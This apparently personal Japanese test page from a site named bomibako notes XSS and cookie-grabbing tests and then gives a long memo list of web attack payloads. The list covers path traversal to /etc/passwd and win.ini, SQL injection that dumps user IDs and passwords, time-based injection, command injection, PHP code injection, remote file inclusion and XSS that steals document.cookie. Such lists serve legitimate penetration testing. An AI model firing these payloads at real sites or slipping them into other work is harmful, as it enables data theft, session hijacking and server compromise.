bomibako
XSSテスト---
Hello!
---
自ドメイン内でYahooIframe表示テスト
js生成DOMによる画像読み込みテスト
twitterなどのシェア一覧調査が出来るらしいWEBのビーコンをおいてみた
http://getshar.es/create
よくわからなかったので放置しておく
イメージ読み込み?じゃないjsアラート表示
ただのテスト なんでもない
押すとクッキー取得
bomibakoでは過去にこんな活動がありました
~2009無料レンタルサーバ
~2011ブログ用倉庫として
新規登録停止中
連絡いただければ個別対応いたします
メモ
'/../../../../../../../../../etc/hosts',
'/../../../../../../etc/hosts',
'/../../../etc/hosts',
'/etc/hosts',
'/../../../../../../../../../etc/hosts%00',
'/../../../../../../etc/hosts%00',
'/../../../etc/hosts%00',
'/etc/hosts%00',
'/../../../../../../../../../windows/win.ini',
'/../../../../../../windows/win.ini',
'/../../../windows/win.ini',
'/windows/win.ini',
'/../../../../../../../../../windows/win.ini%00',
'/../../../../../../windows/win.ini%00',
'/../../../windows/win.ini%00',
'/../../../../../../../var/tmp/',
'/../../../../../../../var/cache/mod_proxy/',
'/../../../../../../../var/cache/',
'/../../../../../../../var/www/',
'/../../../../../../../etc/',
'/../../../../../../../option/',
'/../../../../../../../home/',
'/../../../../../../../usr/',
'/../../../windows/win.ini%00',
'/../../../windows/win.ini%00',
'/windows/win.ini%00',
'?file=/etc/passwd',
'?file=/Windows/win.ini',
'?file=/MSOCache/',
'?file=C:\Windows\System32\cmd.exe?',
'/abc',
'/*',
'\'',
'\"',
'\,',
"'",
"' and 'a'='a'",
"test and 1=1",
"test ' or 'a'='a'",
"%",
"', \", <, and >",
"'>\">
",
"'>\">",
"",
"javascript:alert(document.cookie);",
"/../../../../../../../sbin/ifconfig|",
";/sbin/ifconfig",
"/../../../../../../../windows/system32/ipconfig|",
"&/windows/system32/ipconfig",
"'+AND+'1'%3D'1",
"'waitfor%20delay'0%3a0%3a20'--",
"'waitfor%20delay'0%3a0%3a00'--",
"''\"\"¥",
"'\"¥'\"¥",
"'+AND+'1'%3D'2",
"'+AND+'1'%3D'1",
"'++'",
"'++'’",
">
alert("XSS")',
'1%00">
◆◆◆◆◆◆◆◆◆◆◆◆<',
'',
'',
'20pt',
'XSS',
'',
'XSS part2',
'?file=http://bomibako.com/myphp.txt',
'?file=php://echo"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"',
"?heighlight=a','a',phpinfo());//",
"filter_func=preg_replace&from=/^/e&to=phpinfo();",
"?dir=| cat /etc/passwd",
"?dir=--version",
"xxx OR 1/*",
'1+onmouseover%3dalert(document.cookie)',
'"+onmouseover%3d"alert(document.cookie)',
// nameは変更してもよい なるべくシステムに存在する変数に合わせる
'name=");alert(document.cookie)//',
'name=\');alert(document.cookie)//',
"name='+and+cast((select+id||':'||pwd+from+users+offset+0+limit+1)+as+integr)>1--",
"name='+union+select+id,pwd,name,addr,null,null,null+from+users--",
"name=';copy+users(name)+from+'/etc/passwd'--",
"author='+union+select+table_name,column_name,data_type,null,null,null+from+information_schema.columns+order+by+1--",
"PHPSESSID=KBMJ"